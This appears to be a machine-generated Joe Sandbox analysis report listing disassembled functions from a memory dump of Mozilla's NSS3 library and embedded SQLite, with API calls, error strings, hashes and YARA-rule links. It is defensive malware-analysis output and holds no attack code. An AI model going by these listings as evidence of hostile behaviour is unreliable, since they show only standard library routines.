                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(askpw,00000000), ref: 6C4D4A4F
                                                                                                                                                                                                                                                      • PL_strcasecmp.NSS3(00000000,every), ref: 6C4D4A6C
                                                                                                                                                                                                                                                      • PL_strcasecmp.NSS3(00000000,timeout), ref: 6C4D4A81
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4AAB
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4ABE
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,hasRootCerts,0000000C), ref: 6C4D4ADC
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4B17
                                                                                                                                                                                                                                                      • NSSUTIL_ArgGetParamValue.NSS3(rootFlags,00000000), ref: 6C4D4B33
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D413D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4D4162
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D416B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(2BMl,?,00000001), ref: 6C4D4187
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: NSSUTIL_ArgSkipParameter.NSS3(2BMl), ref: 6C4D41A0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: isspace.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4D41B4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: PL_strncasecmp.NSS3(00000000,0000003D,?), ref: 6C4D41CC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D4120: NSSUTIL_ArgFetchValue.NSS3(2BMl,?), ref: 6C4D4203
                                                                                                                                                                                                                                                      • PL_strncasecmp.NSS3(00000000,hasRootTrust,0000000C), ref: 6C4D4B53
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4B94
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C4D4BA7
                                                                                                                                                                                                                                                      • free.MOZGLUE(00000000), ref: 6C4D4BB7
                                                                                                                                                                                                                                                      • isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4BC8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: isspace$Valuefree$L_strncasecmp$Alloc_ParamParameterSkipUtil$FetchL_strcasecmpstrlen$ArenaDecodeFlagsLongNumberParseReadSlotmemsetstrcpystrncpy
                                                                                                                                                                                                                                                      • String ID: askpw$every$hasRootCerts$hasRootTrust$rootFlags$slotFlags$timeout
                                                                                                                                                                                                                                                      • API String ID: 3791087267-1256704202
                                                                                                                                                                                                                                                      • Opcode ID: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                                                      • Instruction ID: e7edef33c227cceac4331c04802834058f915c1b7ea3aa212db52f9d94d7a7a6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e7dad37dc284b67b2e2beb91f38011d4a3aa333399e1b9fc20bc1c4a9b26d95
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C12874E053558BEB00EFA59C60FAE7FB4AF06289F161069EC95A7B01E321B905C7A1
                                                                                                                                                                                                                                                      Function 6C496D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59A8EC,0000006C), ref: 6C496DC6
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59A958,0000006C), ref: 6C496DDB
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59A9C4,00000078), ref: 6C496DF1
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59AA3C,0000006C), ref: 6C496E06
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,6C59AAA8,00000060), ref: 6C496E1C
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C496E38
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PK11_DoesMechanism.NSS3(?,?), ref: 6C496E76
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C49726F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C497283
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                                                                      • String ID: !
                                                                                                                                                                                                                                                      • API String ID: 3333340300-2657877971
                                                                                                                                                                                                                                                      • Opcode ID: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
                                                                                                                                                                                                                                                      • Instruction ID: 4071b83a5d03b888a061cc4d1c4e767c199035fff28d2b3f510991885750af0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b60902260934a85e676dfeb0023df1fbbeb5c93f781a70e9a5b22825df30d05
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7C726D75D052299FDF60DF28CC88F9ABBB5AF49304F1441A9D80DA7701EB31AA85CF91
                                                                                                                                                                                                                                                      Function 6C403C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403C66
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C403D04
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403EAD
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403ED7
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C403F74
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C404052
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C40406F
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C40410D
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C40449C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 2597148001-598938438
                                                                                                                                                                                                                                                      • Opcode ID: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
                                                                                                                                                                                                                                                      • Instruction ID: 85ebc5645fe9e8d22e758b1a974933a6cf8439fb38406ab36c9365d042f9e2dc
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e22fd8518e754b649f4b143a3675a4a312cbb3ab5959f98efe6f6a3d6b54b82
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F829C75B40215CFCB04CF69C480F9ABBB2BF99358F2591A8D905ABB51E731EC42CB91
                                                                                                                                                                                                                                                      Function 6C4DAC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4DACC4
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C4DACD5
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C4DACF3
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C4DAD3B
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C4DADC8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADDF
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DADF0
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4DB06A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB08C
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB1BA
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C4DB27C
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C4DB2CA
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4DB3C1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4DB40C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1285963562-0
                                                                                                                                                                                                                                                      • Opcode ID: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                                                      • Instruction ID: 3c7879ab5c02910b5b40b93fec9718ec6afcaea9f7c0994789f7d05137e82106
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e006eef8e4eca0f3b98ee6127328d5f3a2c7fc41dbd0bc686811982adcb2c3ce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C022BE71A04300AFE700EF14CC55F9A77E1AF8430CF25856CE8595B7A2E772E859CB96
                                                                                                                                                                                                                                                      Function 6C421F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C4225F3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • '%s' is not a function, xrefs: 6C422FD2
                                                                                                                                                                                                                                                      • no such table: %s, xrefs: 6C4226AC
                                                                                                                                                                                                                                                      • cannot have both ON and USING clauses in the same join, xrefs: 6C4232B5
                                                                                                                                                                                                                                                      • unsafe use of virtual table "%s", xrefs: 6C4230D1
                                                                                                                                                                                                                                                      • multiple recursive references: %s, xrefs: 6C4222E0
                                                                                                                                                                                                                                                      • no tables specified, xrefs: 6C4226BE
                                                                                                                                                                                                                                                      • H, xrefs: 6C42329F
                                                                                                                                                                                                                                                      • H, xrefs: 6C42322D
                                                                                                                                                                                                                                                      • no such index: "%s", xrefs: 6C42319D
                                                                                                                                                                                                                                                      • %s.%s.%s, xrefs: 6C42302D
                                                                                                                                                                                                                                                      • a NATURAL join may not have an ON or USING clause, xrefs: 6C4232C1
                                                                                                                                                                                                                                                      • too many references to "%s": max 65535, xrefs: 6C422FB6
                                                                                                                                                                                                                                                      • cannot join using column %s - column not present in both tables, xrefs: 6C4232AB
                                                                                                                                                                                                                                                      • recursive reference in a subquery: %s, xrefs: 6C4222E5
                                                                                                                                                                                                                                                      • too many columns in result set, xrefs: 6C423012
                                                                                                                                                                                                                                                      • table %s has %d values for %d columns, xrefs: 6C42316C
                                                                                                                                                                                                                                                      • %s.%s, xrefs: 6C422D68
                                                                                                                                                                                                                                                      • access to view "%s" prohibited, xrefs: 6C422F4A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                                      • String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                                                      • API String ID: 3510742995-3400015513
                                                                                                                                                                                                                                                      • Opcode ID: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                                                      • Instruction ID: 0df73f0f68d14d4ffff84c62cb68cf6dfc465f22f528f58ae12982e691c99c92
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dfbb6cb7bfce673a14458ee51b07af61acdb06a392534ec69f5b27ad91f17c08
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04D2AF70E14209CFDB24CF95C485F9DBBB1FF49328F288169D855ABB51DB39A842CB90
                                                                                                                                                                                                                                                      Function 6C45ECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • sqlite3_initialize.NSS3 ref: 6C45ED38
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F4F60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C3F4FC4
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(snippet), ref: 6C45EF3C
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(offsets), ref: 6C45EFE4
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DFC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000003,?,6C3F5001,?,00000003,00000000), ref: 6C51DFD7
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F087
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(matchinfo), ref: 6C45F129
                                                                                                                                                                                                                                                      • sqlite3_mprintf.NSS3(optimize), ref: 6C45F1D1
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C45F368
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: sqlite3_mprintf$strlen$sqlite3_freesqlite3_initialize
                                                                                                                                                                                                                                                      • String ID: fts3$fts3_tokenizer$fts3tokenize$fts4$fts4aux$matchinfo$offsets$optimize$porter$simple$snippet$unicode61
                                                                                                                                                                                                                                                      • API String ID: 2518200370-449611708
                                                                                                                                                                                                                                                      • Opcode ID: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                                                      • Instruction ID: 1932adc27df13985bd953630774d69a444771f04c9ecd4b27cd453ee63896bbe
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 054a2908f7ce6e0132ddeca95b9e5126695c27f784df0f7a33c09236be0c55f1
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B02EEB1B057014BF704DF619C85F2B36B2BBC5208F54893CD85A97B40EB79E9668B83
                                                                                                                                                                                                                                                      Function 6C4D7C00 Relevance: 31.9, APIs: 21, Instructions: 421COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7C33
                                                                                                                                                                                                                                                      • NSS_OptionGet.NSS3(0000000C,00000000), ref: 6C4D7C66
                                                                                                                                                                                                                                                      • CERT_DestroyCertificate.NSS3(00000000), ref: 6C4D7D1E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: SECOID_FindOID_Util.NSS3(?,?,?,6C4D91C5), ref: 6C4D788F
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7D48
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7D71
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D7DD3
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7DE1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C4D7DF8
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7E1A
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE067,00000000), ref: 6C4D7E58
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C4D91C5), ref: 6C4D78BB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PORT_ZAlloc_Util.NSS3(0000000C,?,?,?,6C4D91C5), ref: 6C4D78FA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: strchr.VCRUNTIME140(?,0000003A,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7930
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D7951
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(00000000,?,?), ref: 6C4D7964
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4D797A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C4D7988
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: memcpy.VCRUNTIME140(?,00000001,00000001), ref: 6C4D7998
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: free.MOZGLUE(00000000), ref: 6C4D79A7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,6C4D91C5), ref: 6C4D79BB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D7870: PR_GetCurrentThread.NSS3(?,?,?,?,6C4D91C5), ref: 6C4D79CA
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4D7E49
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4D7F8C
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C4D7F98
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4D7FBF
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C4D7FD9
                                                                                                                                                                                                                                                      • PK11_ImportEncryptedPrivateKeyInfoAndReturnKey.NSS3(?,00000000,?,?,?,00000001,00000001,?,?,00000000,?), ref: 6C4D8038
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000000), ref: 6C4D8050
                                                                                                                                                                                                                                                      • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C4D8093
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3 ref: 6C4D7F29
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C4D8072
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3 ref: 6C4D80F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DBC10: SECITEM_CopyItem_Util.NSS3(?,?,?,?,-00000001,?,6C4D800A,00000000,?,00000000,?), ref: 6C4DBC3F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
